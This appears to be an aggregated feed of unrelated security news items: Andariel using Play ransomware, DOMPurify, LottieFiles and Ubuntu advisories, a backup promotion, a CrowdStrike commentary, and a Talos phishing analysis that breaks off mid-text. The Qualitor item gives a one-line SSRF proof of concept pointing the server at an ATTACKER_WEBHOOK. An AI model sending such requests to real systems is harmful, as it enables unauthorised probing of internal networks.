The prominent state-sponsored advanced persistent threat (APT), aka Jumpy Pisces, appears to be moving away from its primary cyber-espionage motives and toward wreaking widespread disruption and damage.

Source: DD Images via Shutterstock

One of North Korea's most prominent state-sponsored threat groups has pivoted to using Play ransomware in recent attacks, signifying the first time the group has partnered up with an underground ransomware network. Worryingly, it sets the stage for future high-impact attacks, researchers surmise.

According to Palo Alto Networks' Unit 42, which tracks the advanced persistent threat (APT) as Jumpy Pisces (aka Nickel Hyatt, Onyx Sleet, Silent Chollima, Stonefly, and TDrop2), Andariel is now working with the Play ransomware gang, but whether it's as an initial access broker (IAB) or affiliate of the ransomware group is not clear, the researchers observed in a blog post on Oct. 31. Previously, Andariel was associated with a ransomware strain called "Maui" that's been active since at least 2022.

Unit 42 researchers believe the group is responsible for a Play ransomware attack discovered last month in which attackers gained initial access to a network via a compromised user account several months before, in May. Andariel moved laterally after its initial network breach and maintained persistence by spreading the open source tool Sliver and its unique custom malware, DTrack, to other hosts via the Server Message Block (SMB) protocol, according to Unit 42. Months later, in early September, it deployed the Play payload.

Related:Cybersecurity Training Resources Often Limited to Developers

"This shift in their tactics, techniques and procedures (TTPs) signals deeper involvement in the broader ransomware threat landscape," Unit 42 researchers wrote in the post. "This development could indicate a future trend where North Korean threat groups will increasingly participate in broader ransomware campaigns, potentially leading to more widespread and damaging attacks globally."

**Ransomware in Transition?**

Play ransomware, maintained and deployed by a group tracked as Fiddling Scorpius, made its claim to fame by targeting the city of Oakland, Calif., in February 2023 with a crippling attack. It then quickly rose up the threat ranks to become a major player in the game.

Some researchers have suggested that Fiddling Scorpius has transitioned from mounting its own attacks to a ransomware-as-a-service (RaaS) model, according to Unit 42. However, the group itself has announced on its Play ransomware leak site that it does not provide a RaaS ecosystem, according to the researchers. If this is true, then Andariel most likely acted as an IAB in the attack rather than an affiliate, they said.

Either way, "network defenders should view … \[the\] activity as a potential precursor to ransomware attacks, not just espionage, underscoring the need for heightened vigilance," according to Unit 42.

Related:Codasip Donates Tools to Develop Memory-Safe Chips

There were several clues in the attack sequence that point to collaboration between Andariel and the Play ransomware. For one, the compromised account that attackers used for initial access and subsequent spreading of Andariel's signature tools, including Silver and Dtrack, was the same one used prior to ransomware deployment.

"The ransomware actor leveraged the account to abuse Windows access tokens, move laterally and escalate to SYSTEM privileges via PsExec," according to the post. "This eventually led to the mass uninstallation of endpoint detection and response (EDR) sensors and the onset of Play ransomware activity."

The researchers also observed command-and-control (C2) communication with the Silver malware the day before Play ransomware was deployed. Moreover, Play ransomware attacks are known for leaving tools in the in the folder C:\\Users\\Public\\Music, and some tools used prior to ransomware deployment in the Andariel attack also were located there, the researchers noted.

**Defenders Beware Rising North Korean Ransomware Threat**

Andariel has been active for several years and has mounted a number of high-profile attacks that have targeted critical defense, aerospace, nuclear, and engineering companies as well as global managed service providers.

Related:Samsung Zero-Day Vuln Under Active Exploit, Google Warns

Andariel is controlled by North Korea's military intelligence agency, the Reconnaissance General Bureau, which is involved in the nation's illicit arms trade and responsible for its malicious cyber activity. The group's antics already have drawn the attention of international law enforcement, including the US National Security Agency (NSA), which considers the group an ongoing threat to various industry sectors, particularly in the US, South Korea, Japan, and India.

The US Department of State's Rewards for Justice (RFJ) is even offering a reward of up to $10 million for information that could lead it to Rim Jong Hyok, a key player in Andariel's management structure, or any co-conspirators in the group.

Given the need for worldwide organizations to be on alert, Unit 42 included a list of indicators of compromise (IoCs) in its blog post. The researchers advised that defenders leverage the latest threat intelligence to identify malware on networks, and advanced URL filtering and DNS security products to spot known URLs and domains associated with Andariel's malicious activity.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

North Korea's Andariel Pivots to 'Play' Ransomware Games

The jsonProxy.php endpoint on the ABB BMS/BAS controller is vulnerable to username enumeration. An unauthenticated attacker can interact with the UserManager servlet to enumerate valid usernames on the system. Since jsonProxy.php proxies requests to internal services without requiring authentication, attackers can gain unauthorized insights into valid usernames.

ABB Cylon Aspect 3.08.01 (badassMode) File Upload MD5 Checksum Bypass

The issue of GitHub data protection is increasingly discussed among developers on platforms like Reddit, X, and HackerNews.…

The issue of GitHub data protection is increasingly discussed among developers on platforms like Reddit, X, and HackerNews. This year alone, GitHub has been in the news multiple times due to malware incidents, high-severity vulnerabilities, and data deletion events, all of which pose risks to users’ data.

How can developers secure their GitHub environments? While widely recommended practices include least-privilege access controls, routine testing, API authentication, frequent rotation of access tokens, and using SSH keys, backups deserve particular focus. Establishing a reliable GitHub backup system is essential for safeguarding data effectively.

****Why back up your GitHub account?** **

According to The State of DevOps Threats Report by GitProtect.io, the number of incidents that impacted GitHub users in 2023 grew by over 21%. And around 13.94% of events that took place had a major impact on the service. 

If you check Q1 and Q2 of 2024, you will see that there have already been 70+ incidents that influence GitHub users in various ways. Just to note, in 2023 there were 160+ different incidents, starting from major impact to maintenance. 

Why is it important to back up your GitHub environment? Anything can happen, and it’s always wise to prepare for worst-case scenarios. In such cases, having a backup can help by:

*   Protect GitHub repositories and metadata against outages and other unpredictable threats, as it allows the restoration of a copy to another location and ensures workflow and business continuity, 

*   Safeguard against human errors, like accidental deletion of files, 

*   Ensure data recoverability in case of a ransomware attack, as backup is the final line of protection, 

*   Fulfill the Shared Responsibility Model which defines the roles and responsibilities of GitHub and its users. Here it’s worth mentioning that GitHub data protection is the user’s duty. In GitHub Terms of Service, it’s written: “You are responsible for keeping your Account secure while you use our Service. We offer tools such as two-factor authentication to help you maintain your Account’s security, but the content of your Account and its security are up to you.” 

*   Meet security compliance and data retention requirements, as the majority of security protocols and compliance regulations require organizations to have longer retention times, backup, and Disaster Recovery guarantees. GDPR, HIPAA, PCI DSS, FedRAMP, ISO/IEC 27001, FINRA, HITECH, NIS 2 Directive, etc. – they all require organizations to have a backup. 

****Top 10 tips to make sure your GitHub backup plan is effective** **

Considering all the threats, an effective backup plan should help to foresee any disaster scenario and guarantee that all the GitHub account data won’t be lost. 

****Tip 1: Full data coverage** **

Efficient backup should include all the repositories, and metadata, such as issues, pull requests, issue comments, webhooks, wiki, labels, deployment keys, projects, pipelines, and Git LFS. It will help to ensure complete repo integrity and full data protection. 

****Tip 2: Backup automation** **

It’s important to have the possibility to automate backup processes by scheduling backup policies at the most appropriate time and frequency. For example, set up a backup plan that triggers a copy every 4 hours.  

****Tip 3: Various backup performance schemes** **

Not to overload your storage, you should have the option to define different rotation and performance schemes for every backup copy you set up. They may be full, incremental, or differential backup copies. 

****Tip 4: Multi-storage consistency** **

By having a few copies in different storage locations, you can eliminate any risk of a disaster and meet the 3-2-1 backup rule which requires to have at least 3 backup copies in 2 or more storage locations, with 1 offsite. 

Moreover, when it comes to storage destinations, you should be able to back up your repository and other related data to both local and cloud storage instances. 

****Tip 5: Backup replication** **

Having a few copies in various locations isn’t enough. You should make sure that you can enable replication between backup storage destinations. In this case, all the copies will be consistent and in the event of failure, you will be able to restore your data from any of the storage instances if one of them fails to run. 

****Tip 6:  Long-term retention** **

Retention is closely related to compliance and data recovery from any point in the past. By default, GitHub stores build logs for 90 days. However, it might be not enough for those organizations that operate in regulated industries or require much longer retention times. 

A backup solution should help solve this issue by allowing long-term or even unlimited retention. Thus, an organization will be able to recover its data from any point in time, for example, from 3 or 5 years prior. 

****Tip 7: Transparent management and monitoring** **

Not all team members should have the same access to backups. Hence, the backup software should allow you to set various roles and assign different responsibilities to your team members. For example, there may be those, who are either responsible for setting up GitHub backups, triggering recovery in case of a failure, only viewing backup performance, or system administrators who can operate without restrictions.  

What is more, you should always get notifications when your backup or restore was performed with details and statuses. There can be different ways of notifications – email, Slack, webhooks as well as a dedicated console with all data-driven information, tasks, SLA, and compliance reports. 

****Tip 8: In-flight and at-rest encryption** **

Your GitHub repo and metadata should be protected at every stage – in-flight, during the transmission, and at rest. Moreover, as an additional security measure, you should be able to set your personal encryption key. 

Also, your device should have no information about the encryption key, it should receive it only during the backup performance to keep up with the zero-encryption approach.  

****Tip 9: Ransomware protection** **

As backup is a final line of defence, it must be ransomware-proof. Immutable storage that helps keep data in a non-executable format, every-scenario-ready Disaster Recovery, encryption should be arranged and work as a clock to ensure your GitHub data protection and recoverability. Moreover, backup software should guarantee secure access authorization, for example, via SAML SSO protocols. 

****Tip 10: Restore and Disaster Recovery** **

Having a consistent GitHub backup should mean that you can restore your data in any event of failure – ransomware attack, service outage, infrastructure downtime, etc. The backup solution should allow you to restore your data fully or granularly – only selected metadata or repositories. 

Regarding the restore destinations, the solution should also foresee any event of failure. Thus, you should have the option to recover your GitHub data to the same or a new GitHub account, to your local machine, or cross-over recovery to another Git hosting platform, like GitLab, Bitbucket, or Azure DevOps. 

What’s more, during the recovery process, you shouldn’t overwrite the existing data but have the opportunity to restore it as a new file. 

****Is my GitHub backup effective?** **

To ensure that your backup processes are efficient, your backup should respond to the mentioned tips. 

However, how to build your backup strategy for your GitHub environment is the question you should answer taking into account your security and compliance requirements, the size of your GitHub ecosystem, the evaluation of data loss risks, and others. 

You can go with the “Download zip” files and folders option or backup scripts, however, they won’t ensure automation, proper protection against ransomware, and restore capabilities. In this case, all the responsibility over GitHub data protection is on your side. 

Alternatively, you can use a dedicated backup software, like GitProtect.io for GitHub, that will help you both share your duties over GitHub data protection and ensure your data is accessible and recoverable in any disaster scenario. With scheduled automated backup procedures, full data coverage, data residency of your choice, ransomware protection, and advanced disaster recovery measures, the backup provider brings peace of mind that every line of your source code is secured.

1.  **How To Safeguard Your Data With Cloud MRP System**
2.  **How to Hide Tables in SQL Server Management Studio**
3.  **How to Recover Deleted Emails from Exchange Server?**
4.  **Cloud Solutions Transform Software Quality Assurance**
5.  **How to Choose the Best Analytics Tools for Mobile Apps**
6.  **How To Craft The Perfect Data Loss Prevention Strategy**
7.  **How to Install Microsoft Exchange Updates with Reliability**
8.  **Insights on Google Cloud Backup, Disaster Recovery Service**

How To Create a Complete GitHub Backup

dompurify was vulnerable to prototype pollution

Fixed by https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-p3vf-v8qc-cwcr: DOMPurify vulnerable to tampering by prototype polution

LottieFiles has revealed that its npm package "lottie-player" was compromised as part of a supply chain attack, prompting it to release an updated version of the library.
"On October 30th ~6:20 PM UTC - LottieFiles were notified that our popular open source npm package for the web player @lottiefiles/lottie-player had unauthorized new versions pushed with malicious code," the company said in a

Cryptocurrency / Software Development

LottieFiles has revealed that its npm package "lottie-player" was compromised as part of a supply chain attack, prompting it to release an updated version of the library.

"On October 30th ~6:20 PM UTC - LottieFiles were notified that our popular open source npm package for the web player @lottiefiles/lottie-player had unauthorized new versions pushed with malicious code," the company said in a statement on X. "This does not impact our dotlottie player and/or SaaS service."

LottieFiles is an animation workflow platform that enables designers to create, edit, and share animations in a JSON-based animation file format called Lottie. It's also the developer behind an npm package named lottie-player, which allows for embedding and playing Lottie animations on websites.

According to the company, "a large number of users using the library via third-party CDNs without a pinned version were automatically served the compromised version as the latest release."

The malicious versions of the package contained code that prompted users to connect their cryptocurrency wallets, with the likely goal of draining their funds. Users who are on versions 2.0.5, 2.0.6, and 2.0.7 are recommended to update to 2.0.8.

"Versions 2.0.5, 2.0.6, 2.0.7 were published directly to https://npmjs.com over the course of an hour using a compromised access token from a developer with the required privileges," LottieFiles noted.

Besides releasing a fix, the three rogue versions have been unpublished from the npm package repository. LottieFiles said it has also activated its incident response plan and engaged an external incident response team to assist with the investigation.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

LottieFiles Issues Warning About Compromised "lottie-player" npm Package

Qualitor versions 8.24 and below suffer from an unauthenticated server-side request forgery vulnerability.

    # CVE-2024-48360 | Qualitor <= v8.24 Unauthenticated SSRF## DescriptionQualitor is a platform for business process management, and this system is present in various companies in Brazil that can be identified simply by using Google dorking.Our team identified a vulnerability in the application susceptible to SSRF, which allows enumerate internal systems/ports.## Proof of Concept (POC)Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.To exploit, just send a request to host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK, you will receive the request from vulnerable server.![image](https://github.com/user-attachments/assets/c7f3dd6f-759d-430c-a135-fdc01e802619)### Researcheshttps://www.linkedin.com/in/xvinicius/- OpenXP Research Team

Qualitor 8.24 Server-Side Request Forgery

Proof of concept exploit for a command injection vulnerability in CyberPanel. This vulnerability enables unauthenticated attackers to inject and execute arbitrary commands on vulnerable servers by sending crafted OPTIONS HTTP requests to /dns/getresetstatus and /ftp/getresetstatus endpoints, potentially leading to full system compromise. Versions prior to 1c0c6cb appear to be affected.

CyberPanel Command Injection

Ubuntu Security Notice 7084-2 - USN-7084-1 fixed vulnerability in urllib3. This update provides the corresponding update for the urllib3 module bundled into pip. It was discovered that urllib3 didn't strip HTTP Proxy-Authorization header on cross-origin redirects. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-7084-2  
October 30, 2024

python-pip vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

urllib3 could leak sensitive information.

Software Description:  
- python-pip: Python package installer

Details:

USN-7084-1 fixed vulnerability in urllib3. This update provides the  
corresponding update for the urllib3 module bundled into pip.

Original advisory details:

 It was discovered that urllib3 didn't strip HTTP Proxy-Authorization  
 header on cross-origin redirects. A remote attacker could possibly use  
 this issue to obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  python3-pip                     24.2+dfsg-1ubuntu0.1  
  python3-pip-whl                 24.2+dfsg-1ubuntu0.1

Ubuntu 24.04 LTS  
  python3-pip                     24.0+dfsg-1ubuntu1.1  
  python3-pip-whl                 24.0+dfsg-1ubuntu1.1

Ubuntu 22.04 LTS  
  python3-pip                     22.0.2+dfsg-1ubuntu0.5  
  python3-pip-whl                 22.0.2+dfsg-1ubuntu0.5

Ubuntu 20.04 LTS  
  python-pip-whl                  20.0.2-5ubuntu1.11  
  python3-pip                     20.0.2-5ubuntu1.11

Ubuntu 18.04 LTS  
  python-pip                      9.0.1-2.3~ubuntu1.18.04.8+esm6  
                                  Available with Ubuntu Pro  
  python-pip-whl                  9.0.1-2.3~ubuntu1.18.04.8+esm6  
                                  Available with Ubuntu Pro  
  python3-pip                     9.0.1-2.3~ubuntu1.18.04.8+esm6  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  python-pip                      8.1.1-2ubuntu0.6+esm10  
                                  Available with Ubuntu Pro  
  python-pip-whl                  8.1.1-2ubuntu0.6+esm10  
                                  Available with Ubuntu Pro  
  python3-pip                     8.1.1-2ubuntu0.6+esm10  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7084-2  
  https://ubuntu.com/security/notices/USN-7084-1  
  CVE-2024-37891

Package Information:  
https://launchpad.net/ubuntu/+source/python-pip/24.2+dfsg-1ubuntu0.1  
https://launchpad.net/ubuntu/+source/python-pip/24.0+dfsg-1ubuntu1.1  
https://launchpad.net/ubuntu/+source/python-pip/22.0.2+dfsg-1ubuntu0.5  
https://launchpad.net/ubuntu/+source/python-pip/20.0.2-5ubuntu1.11

Ubuntu Security Notice USN-7084-2

Knee-jerk reactions to major vendor outages could do more harm than good.

Source: SOPA Images Limited

COMMENTARY

The now-infamous July CrowdStrike outage sparked global chaos and countless conversations about vendor security. Despite the industry noise and myriad headlines about the outage — and its potential cost of more than $5 billion to Fortune 500 companies alone — there is a bigger picture we must consider. And that is how, as an industry, we understand the risks involved and respond to major outages and other cybersecurity crises. 

While the CrowdStrike outage was a freak accident, it's likely not the last time we'll witness this kind of meltdown from a major technology provider. As our digital ecosystems become further interconnected and enterprises increasingly put their trust in singular vendors, business leaders will have to grapple with the inevitability of similar events, whether from a simple outage or a malicious hack. In every case along that spectrum, however, these leaders must avoid knee-jerk reactions that could ultimately do more harm than good. Blindly switching to a new vendor or making drastic changes to IT and security processes could introduce security holes that exacerbate vulnerabilities in an organization's overall security posture, rather than improving it.  

Instead of immediately jumping ship, here are the three things companies should do in the wake of a CrowdStrike-like event to ensure business continuity and high operational standards.  

**1\. Assess Vendors' Overall Reliability and Risk**

Switching vendors after an incident isn't as simple — or as beneficial — as it may seem. Before switching, businesses must evaluate both the existing and potential vendor, and assess each vendor's overall reliability and risk. For instance, Resilience customer data shows that despite the July incident, CrowdStrike Falcon is highly effective. It has the lowest percentage of material claims of endpoint detection and response (EDR) vendors in Resilience's portfolio, with fewer than 3% of clients with Falcon experiencing a cyber-insurance claim with losses. Of course, no company can — or should — claim the ability to avoid 100% of incidents, but in these kinds of deliberations, it's critical to put a vendor's long-term track record into perspective. On the flip side, however, if a vendor shows a consistent history of outages or vulnerabilities (as has VPN provider Ivanti, of late), poor performance or communication, and long delays in remediation, an incident could be the helpful forcing factor in considering the benefits of trying something new.  

It's also important to note the costs of switching vendors that go beyond sticker price, such as implementation time, staff training costs, and adjusting workflows to incorporate the new system and meet business needs. These third-party risk considerations must be considered, with leadership weighing the business interruption costs of an outage with the existing vendor against the total costs that come with making a switch.  

**2\. Avoid Radical Changes to the Update Process**

This particular outage raised the issue of update cadence and testing frequency, with many arguing that the affected organizations should have taken a more cautious, thorough approach to testing the update before rolling it out. But delaying updates is a calculated risk, and not necessarily one that most companies should be taking. Antivirus and EDR signatures are designed to counter quick-breaking, emerging threats toward existing systems, so while you can decide to wait to allow the days or weeks it may take to fully test the update, you may be leaving your systems vulnerable to new exploits in the process. Threat actors only grow faster and more sophisticated in their approaches, so quick security updates are more crucial than ever. The risk of taking additional precautions in testing may not be worth it for every company, especially since most updates happen seamlessly. After all, part of the reason CrowdStrike made headlines was because the outage was so out of the ordinary. 

In a perfect world, where bad actors weren't a consistent threat and update processes took no extra time, following the typical best practice of testing each and every update that comes from each and every vendor might be feasible. But in the real world, changes to the update process are likely to slow down your defenses. Ultimately, there is no one-size-fits-all answer, and the best approach will depend on the specific organization and its risk tolerance.  

**3\. Don't Panic**

It's tempting to liken incidents like CrowdStrike to natural disasters (such as catastrophic hurricanes), but that oversimplification distracts from the heart of the issue. While many insurers use this analogy to describe cyber events, it's neither accurate nor useful, as it becomes an apples-to-oranges comparison that frames cyber incidents or outages as one-sided and world-ending. But the reality is far different. There's no tangible way for individuals to prevent or mitigate the intensity of category hurricanes or tornadoes, but there are certainly simple, actionable steps we can take to mitigate the financial impact of an outage or counteract the negative effects of a potential attack. This includes implementing proper cyber hygiene, transferring financial risk through cyber insurance, and having a detailed cybersecurity action plan in the event of an attack or outage. It's not only feasible but essential that companies take these steps to remain operable and functioning in the midst of an incident.  

In short, decision-makers across the board can't allow themselves to make reactive or fear-based decisions on their security posture directly following a cyber incident. These knee-jerk reactions could lead to greater complications and introduce a host of new vulnerabilities just waiting to be exploited. Instead, leaders must focus on understanding the root cause of the incident, learning from it, and making risk-driven decisions that mitigate the greatest financial loss and improve their organization's overall cyber resilience. This includes taking a proactive approach and incorporating third-party risk management into business continuity planning. That way, you'll be able to avoid catastrophic interruptions to your day-to-day business and maintain continuity and resilience in the face of a cyber incident. 

**About the Author**

CEO & Co-Founder, Resilience

Vishaal Hariprasad, best known as "V8," co-founded what is now known as Resilience in 2016 to bridge the divide between cyber insurance and cybersecurity. As a licensed insurance broker and producer, as well as a veteran of both the US Air Force and the cybersecurity industry, Vishaal brings the leadership skills he honed in his years with the military to his position as CEO for Resilience. After graduating from the United States Air Force Academy, V8 was commissioned to military service as a Cyber Operations Officer for the Air Force. Hariprasad is an Iraq War veteran and a recipient of a Bronze Star Medal. In 2012, he co-founded Morta Security, which was acquired by Palo Alto Networks, where he then served as a threat intelligence architect. In 2015, V8 was tapped to serve as a founding partner at the Pentagon's newly established Defense Innovation Unit Experimental (DIUx) in Mountain View, California, an office under the Secretary of Defense charged with leveraging commercial technology to solve defense challenges. V8 holds a B.A. in Mathematics from the US Air Force Academy and an M.S. in Information Technology from Virginia Polytechnic Institute and State University (Virginia Tech).

The Case Against Abandoning CrowdStrike Post-Outage

Cisco Talos has observed an unknown threat actor conducting a phishing campaign targeting Facebook business and advertising account users in Taiwan. 
The decoy email and fake PDF filenames are designed to impersonate a company's legal department, attempting to lure the victim into downloading and executing malware.

Thursday, October 31, 2024 09:37

*   Cisco Talos has observed an unknown threat actor conducting a phishing campaign targeting Facebook business and advertising account users in Taiwan. 
*   The decoy email and fake PDF filenames are designed to impersonate a company's legal department, attempting to lure the victim into downloading and executing malware. 
*   This campaign abuses Google's Appspot\[.\]com domains, a short URL and Dropbox service, to deliver an information stealer onto the target's machine to avoid network security product detections. 
*   Talos also observed the threat actor using multiple techniques to evade antivirus detection and sandbox analysis, such as code obfuscation, shellcode encryption, hiding malicious code in resource data to expand the file size to over 700 MB, and embedding LummaC2 or Rhadamanthys information stealers into legitimate binaries. 

**Phishing email campaign targets Taiwan **

Talos observed an unknown threat actor conducting a malicious phishing campaign targeting victims in Taiwan since at least July 2024. The campaign specifically targets victims whose Facebook accounts are used for business or advertising purposes. 

The initial vector of the campaign is a phishing email containing a malware download link. The phishing email uses traditional Chinese in decoy templates and the fake PDF files, suggesting the target is likely traditional Chinese speakers. Some of the fake PDF filenames that we observed during our analysis are: 

*   IMAGE COPYRIGHTED.exe 
*   \[Redacted\] 的影片內容遭到侵犯版權.exe (translates to “\[Redacted\]'s video content has been copyright infringed.exe”) 
*   版權侵權信息- \[Redacted\] Media Co Ltd.exe (translates to “Copyright Infringement Information - \[Redacted\] Media Co Ltd.exe”) 
*   版權侵權信息- \[Redacted\] Media Group Inc.exe (translates to “Copyright Infringement Information - \[Redacted\] Media Group Inc.exe”) 
*   版權侵權信息- \[Redacted\] Technology Group.exe (translates to “Copyright Infringement Information - \[Redacted\] Technology Group.exe”) 
*   版權侵權信息- \[Redacted\] Co. Ltd.exe (translates to “Copyright Infringement Information - \[Redacted\] Co. Ltd.exe”) 
*   \[Redacted\] Online -宣布侵權.exe (translates to “\[Redacted\] Online - declare infringement.exe”) 

The decoy email and fake PDF filenames are designed to impersonate a company's legal department, attempting to lure the victim into downloading and executing malware. Another observation we found is that the fake PDF malware uses the names of well-known technology and media companies in Taiwan and Hong Kong. This provides strong evidence that the threat actor conducted thorough research before launching this campaign. 

Additionally, we observed two phishing emails masquerading as notices from a well-known industrial motor manufacturer and a famous online shopping store in Taiwan. The emails claim that the company’s legal representatives have issued a notice to a Facebook page administrator alleging copyright infringement due to the unauthorized use of their images and videos for product promotion. The emails demand the removal of the infringing content within 24 hours, cessation of further use without written permission, and warn of potential legal action and compensation claims for non-compliance. Last but not least, with these two emails, we can easily identify that the threat actor uses the same template with minor modifications, such as changing the company name, legal department information, address, and website.  

Phishing email impersonating a well-known industrial motor manufacturer. 

Phishing email impersonating a famous online shopping store. 

**Attribution **

Talos observed an unknown image printing EPS file within the encrypted archive, with the filename "Support." Based on the file name and file size, it is likely that all encrypted archives we found on VirusTotal, which we have not been able to decrypt, contain the same EPS files inside. Pivoting off the EPS file metadata and its preview image on a search engine, we found an identical image with the same file name on a Vietnamese-language website. However, there is no strong evidence that it was created by an author from that region.   

Support EPS file metadata. 

The support EPS file preview image in this campaign (left) and the image we found from the internet (right). 

**Actor infrastructure **

The threat actor is abusing Google's Appspot.com domains, a short URL and Dropbox service, to deliver an information stealer onto the target's machine. Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. When the victim clicks on the download link, it initially connects to Appspot.com, then redirects to a short URL created by a third-party service, and finally redirects to Dropbox to download the malicious archive. The actor is using the third-party data storage service as a download server to deceive network defenders.  

Malware download link. 

We also discovered that the actor is using multiple command and control (C2) domains in the campaign. The DNS requests for the domains during our analysis period are shown in the graph, indicating the campaign is ongoing.  

C2 domain DNS requests. 

**Malware infection summary **

The infection chain begins with a phishing email containing a malicious download link. When the victim downloads the malicious RAR file, they will need a specific password to extract it, revealing a fake PDF executable malware and an image printing file. Once the malware is decrypted and the fake PDF executable is run, it will execute the embedded LummaC2 or Rhadamanthys information stealer, which then collects the victim’s credentials and data, sending them back to the C2 server. 

The malicious RAR file usually contains a fake PDF executable malware and an image printing file, but we observed a few malicious RAR files that contain an additional DLL file. However, without the correct password, we are not able to extract the malicious RAR file and analyze it. 

The RAR file contains a fake PDF and an image printing file.  

The RAR file contains a fake PDF, an image printing file, and additional DLL file. 

The fake PDF executable malware variant was delivered as a payload in this campaign. This malware will embed LummaC2 or Rhadamanthys information stealers into legitimate binary and the legitimate binary including iMazing Converter, foobar2000, Punto Switcher, PDF Visual Repair, LedStatusApp, and PrivacyEraser. Below shows one of the file details of the fake PDF executable. 

Fake PDF file detail information. 

**LummaC2 stealer and its loader **

LummaC2 Stealer is a type of malware designed to exfiltrate sensitive information from compromised systems. It can target system details, web browsers, cryptocurrency wallets, and browser extensions. Written in C, this malware is sold on underground forums. To avoid detection and analysis, it employs various obfuscation methods. The malware connects to a C2 server to receive instructions and transmit the stolen data. 

The loader for LummaC2 changes the execution flow of the binary malware, causing it to invoke an unknown library to execute the malicious code functions. This strategic modification complicates detection and analysis efforts. Once these malicious functions are invoked, the malware utilizes the CreateFileMappingA API to write the payload into a mapped memory block, effectively hiding it within the system's memory. After successfully mapping the payload, the malware then executes it. 

Call to an unknown library to execute the malicious code functions. 

When the malware begins executing the shellcode in memory, it first decrypts the second half of the program block, which contains part of the shellcode loader and the LummaC2 malware execution file. Once the decryption is complete, it will call the VirtualAllocate API to allocate a memory block, write the information stealer's execution file to that block, and then execute it.   

Jump code to shellcode block. 

 

 

Encrypted shellcode (left side) and decrypted shellcode (right side). 

We also collected all of the build IDs of the LummaC2 in this campaign and below are the screenshots of the LummaC2 stealer alert message box and its POST message. 

Alert message shown to the user when executing LummaC2. 

POST message with act=life and url path /api. 

Build ID: 

*   sTDsFx--Socks 
*   iAlMAC--ghost 

**Rhadamanthys stealer and its loader **

Rhadamanthys is a sophisticated information stealer that emerged in 2022 and is sold on underground forums. This comprehensive stealer malware is capable of gathering system information, credentials, cryptocurrency wallets, browser passwords, cookies, and data from various other applications. It employs numerous anti-analysis techniques, complicating analysis efforts and hindering its execution in sandbox environments. 

